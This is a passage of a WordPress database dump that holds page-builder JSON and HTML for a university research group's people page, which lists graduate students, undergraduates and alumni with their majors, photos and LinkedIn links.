Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c122\",\"index\":3,\"id\":\"182-c126\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c122\",\"index\":1,\"id\":\"182-c127\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c128\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Screen-Shot-2023-09-26-at-9.33.41-PM-e1697207183631.png\",\"caption\":{\"text\":\"\"},\"imageId\":1758,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c128\",\"index\":0,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c128\",\"index\":2,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Master\'s Student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c128\",\"index\":3,\"id\":\"182-c132\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c128\",\"index\":1,\"id\":\"182-c133\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c134\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c135\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-md-shah-sayem-e1697207514119.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1761,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c134\",\"index\":0,\"id\":\"182-c136\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Shah Md Shahnewaz Sayem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c134\",\"index\":2,\"id\":\"182-c137\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c134\",\"index\":3,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/shah-md-shahnewaz-sayem-767540154\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c134\",\"index\":1,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c68\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c67\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c142\",\"parentId\":\"182-c141\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c141\",\"parentId\":\"182-c140\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c140\",\"parentId\":\"182-c67\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c145\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790-e1697207627160.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1763,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c145\",\"index\":0,\"id\":\"182-c147\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c145\",\"index\":2,\"id\":\"182-c148\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c145\",\"index\":1,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c150\",\"parentId\":\"182-c144\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-IMG_9249-e1697207848252.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1765,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c150\",\"index\":0,\"id\":\"182-c152\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"MD Raiyan Haque<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c150\",\"index\":2,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"\\t 4:40 PM       https:\\/\\/www.linkedin.com\\/in\\/mdraiyanhaque\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c150\",\"index\":1,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c144\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c143\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c157\",\"parentId\":\"182-c156\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c156\",\"parentId\":\"182-c155\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c155\",\"parentId\":\"182-c143\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c160\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1772,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c160\",\"index\":0,\"id\":\"182-c162\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c160\",\"index\":2,\"id\":\"182-c163\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c160\",\"index\":1,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c165\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Anvith-e1697208489419.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1780,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c165\",\"index\":0,\"id\":\"182-c167\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c165\",\"index\":2,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c165\",\"index\":1,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c170\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Alex-e1697208598736.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1782,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c170\",\"index\":0,\"id\":\"182-c172\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c170\",\"index\":2,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c170\",\"index\":1,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c175\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c176\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1784,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c175\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c175\",\"index\":2,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c175\",\"index\":1,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c180\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c181\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1786,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c180\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c180\",\"index\":2,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c180\",\"index\":1,\"id\":\"182-c184\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c185\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c186\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1788,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c185\",\"index\":0,\"id\":\"182-c187\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c185\",\"index\":2,\"id\":\"182-c188\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c185\",\"index\":1,\"id\":\"182-c189\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c190\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c191\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1790,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c190\",\"index\":0,\"id\":\"182-c192\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c190\",\"index\":2,\"id\":\"182-c193\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c190\",\"index\":1,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c195\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c196\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-ruby_parcells-scaled-1-2-e1697209095569.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1792,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":2,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c199\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Reshmanjali-1-e1697209179440.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1794,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c199\",\"index\":0,\"id\":\"182-c201\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c199\",\"index\":2,\"id\":\"182-c202\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c199\",\"index\":1,\"id\":\"182-c203\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c204\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c205\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-cropped-Eliza-Schuh-e1697208271242.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1795,\"size\":\"\"},\"domuuid\":\"182-c161\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c204\",\"index\":0,\"id\":\"182-c206\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Eliza Schuh<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c204\",\"index\":2,\"id\":\"182-c207\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/search\\/results\\/all\\/?fetchDeterministicClustersOnly=true&heroEntityKey=urn%3Ali%3Afsd_profile%3AACoAACVdt3kBua3o83BdyteC4Ssk8shnCAvZZZc&keywords=eliza%20schuh&origin=RICH_QUERY_TYPEAHEAD_HISTORY&position=0&searchId=e7657352-5ea3-4501-b984-d21542771bc4&sid=WW)&spellCorrectionEnabled=true\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c204\",\"index\":1,\"id\":\"182-c208\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c209\",\"parentId\":\"182-c159\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c209\",\"index\":0,\"id\":\"182-c210\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Bronson-e1697209357897.png\",\"caption\":{\"text\":\"\"},\"imageId\":1797,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c209\",\"index\":0,\"id\":\"182-c211\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c209\",\"index\":2,\"id\":\"182-c212\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c209\",\"index\":1,\"id\":\"182-c213\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c159\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c158\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c216\",\"parentId\":\"182-c215\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c215\",\"parentId\":\"182-c214\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c214\",\"parentId\":\"182-c158\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-10-13 13:07:34','2023-10-13 17:07:34','',562,'https://gsudice.dataconn.net/?p=1815',0,'revision','',0),(1816,1,'2023-10-13 13:07:34','2023-10-13 17:07:34','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c2\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c64\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c64 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c65-outer\">\n            <div data-colibri-id=\"182-c65\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c65 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c66\" class=\"h-global-transition-all h-heading style-986 style-local-182-c66 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c66\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch 